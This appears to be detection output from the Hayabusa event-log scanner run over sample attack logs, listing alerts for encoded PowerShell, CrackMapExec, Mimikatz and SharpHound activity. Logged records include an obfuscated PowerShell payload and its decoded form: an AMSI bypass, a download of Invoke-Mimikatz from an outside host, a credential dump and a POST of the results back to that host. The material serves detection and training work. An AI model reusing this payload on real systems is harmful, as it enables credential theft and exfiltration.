9828DA72-683B-608C-A50C-000000000C00 | Hash: 
SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter 
Substring,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:32:55.804 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,". 
( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}101d116,46t83d101A114d118A105A99A101W80N111N105N110N116d77}97A110z97}103z101A114N93,58A58N83d101}114}118t101t114}67A101t114A116N105W102}105,99A97t116}101,86}97}108W105W100z97}116,105}111}110W67,97N108A108}98}97}99A107,32A61t32N123t36}116,114A117}101A125N10A116A114A121}123}10}91}82W101W102A93A46d65}115,115}101d109t98,108t121t46}71z101N116N84t121z112d101d40t39z83N121d115z39}43z39t116N101A109d46}77d97d110N39A43z39W97d103W101W109t101}110N116W46d65A117z116z39W43d39}111d109A97z116}105A111z110z46W65A109}39z43A39}115t105}85t116}39N43z39d105A108A115t39z41N46W71W101}116z70d105N101A108t100,40}39,97}109d39A43W39z115}105}73d110}105}39d43t39A116t70t97N105N108}101d100A39z44z32N39W78A111A110z80W39z43d39,117t98N108}105t99}44N83,116W97}39}43A39}116W105,99W39}41z46A83N101,116z86d97}108t117N101z40A36N110d117A108A108z44N32}36}116}114,117A101N41W10,125,99}97A116A99,104d123t125A10}91t78t101}116,46,83d101W114z118}105N99A101d80A111,105t110}116W77,97N110d97,103A101}114W93}58t58}83A101d114z118t101A114A67N101W114d116,105N102d105N99}97,116W101z86t97}108}105A100A97,116z105A111z110}67W97d108d108}98}97z99,107N32N61,32,123}36d116t114}117}101N125}10N91A83}121,115A116}101z109A46}78}101W116N46A83}101,114,118,105}99N101,80,111A105z110A116A77A97,110N97t103t101t114}93}58d58t83N101t99,117d114z105A116d121,80}114,111}116,111}99A111W108W32}61A32W91W83z121W115}116t101}109d46}78A101t116N46t83N101A99}117d114W105d116A121}80d114W111t116z111}99d111z108}84z121N112z101,93A39,83A115z108,51d44W84}108z115A44N84A108t115A49W49N44,84}108}115N49d50,39W10t73t69t88W32}40A78A101A119A45A79d98d106t101z99}116A32W78}101W116t46}87,101N98A67,108A105d101}110d116,41A46z68d111N119N110z108A111}97A100z83t116A114A105A110,103,40A39d104d116N116N112A115t58A47N47z49}48z46,50}51A46}49d50t51N46}49A49A58N52}52}51W47}73W110A118}111A107}101N45t77}105A109}105,107W97t116z122z46,112t115}49A39,41d10t36d99t109z100t32W61d32t73}110,118,111}107d101W45W77z105}109}105,107d97z116d122W32d45t67z1
11A109W109}97d110t100t32A39,112A114}105N118W105}108N101}103z101N58,58t100d101t98z117t103W32W115W101}107t117d114z108A115}97,58N58W108A111A103A111}110A112A97A115N115z119d111}114d100A115N32N101,120}105}116z39}10,36A114}101z113d117N101}115t116N32d61t32A91}83d121A115W116W101d109t46N78t101A116A46}87z101W98z82t101W113d117A101t115d116d93d58N58W67,114}101d97A116}101z40}39N104N116}116t112,115W58t47d47N49A48d46}50A51A46}49,50N51N46}49A49,58t52d52}51}47}39}41A10z36N114}101z113z117N101A115W116A46d77t101W116W104A111t100,32,61z32,39d80,79,83W84d39z10}36t114A101t113d117W101t115N116z46d67}111A110t116z101z110}116t84d121}112A101}32A61t32A39z97d112W112W108}105,99N97d116t105}111z110z47}120}45A119t119z119}45N102,111N114}109A45d117A114t108z101N110A99A111}100}101A100z39A10t36z98}121,116A101z115A32A61}32}91N83}121A115W116N101d109A46}84}101W120N116}46N69,110}99W111W100}105t110,103A93,58A58z65z83W67d73t73W46A71N101}116t66}121,116A101}115A40,36N99A109A100A41z10A36A114z101A113}117,101N115A116W46,67d111d110z116z101t110A116}76}101z110t103}116A104,32}61t32N36d98,121N116z101}115N46}76z101N110,103z116W104}10A36d114d101A113N117}101A115d116}83z116A114A101,97N109z32,61}32}36}114W101t113N117,101W115A116}46A71}101W116A82z101A113A117N101t115N116t83A116A114}101d97d109}40}41t10z36A114t101d113A117}101A115A116A83N116}114d101}97W109A46,87z114d105,116A101,40}36W98N121z116z101t115}44A32z48}44d32}36A98W121t116A101}115W46,76N101t110W103}116,104t41d10A36z114N101}113A117}101}115d116}83A116N114t101W97W109W46,67}108}111}115d101t40t41A10z36W114}101t113t117N101A115N116t46d71t101W116}82W101z115}112}111A110d115}101}40,41'.SPlIT('Nz}tAdA,}W') | ForEach-ObJEct { ([int] $_ -AS [ChAR]) } ) +$( set-itEM 'VaRiAble:Ofs' ' ' ) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:55.923 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Variable): ""Set-Variable"" ParameterBinding(Set-Variable): name=""Name""; value=""Ofs"" ParameterBinding(Set-Variable): name=""Value""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:55.942 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ ([int] $_ -AS [ChAR]) },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:56.691 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Item): ""Set-Item"" ParameterBinding(Set-Item): name=""Path""; value=""VaRiAble:Ofs"" ParameterBinding(Set-Item): name=""Value""; value="" """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Invoke-Expression): ""Invoke-Expression"" ParameterBinding(Invoke-Expression): name=""Command""; value=""[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = 
[System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('https://10.23.123.11:443/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('https://10.23.123.11:443/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()"" TerminatingError(Invoke-Expression): ""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.253 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails 
},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.255 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.274 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.369 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.422 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec 
payload execution.evtx +2021-05-01 05:32:57.425 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.450 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.469 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.477 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-String): ""Out-String"" CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""Transcript""; value=""True"" ParameterBinding(Out-String): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... 
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software."" ParameterBinding(Out-Default): name=""InputObject""; value=""Invoke-Expression : At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:1 char:1 + . ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}10 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.512 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.513 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:57.522 
+09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.524 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.542 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.542 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.556 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo 
},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.597 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... 
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:57.626 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
+2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
+2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x88f3141d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0xbe8573e4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0xbe857415,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd720,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
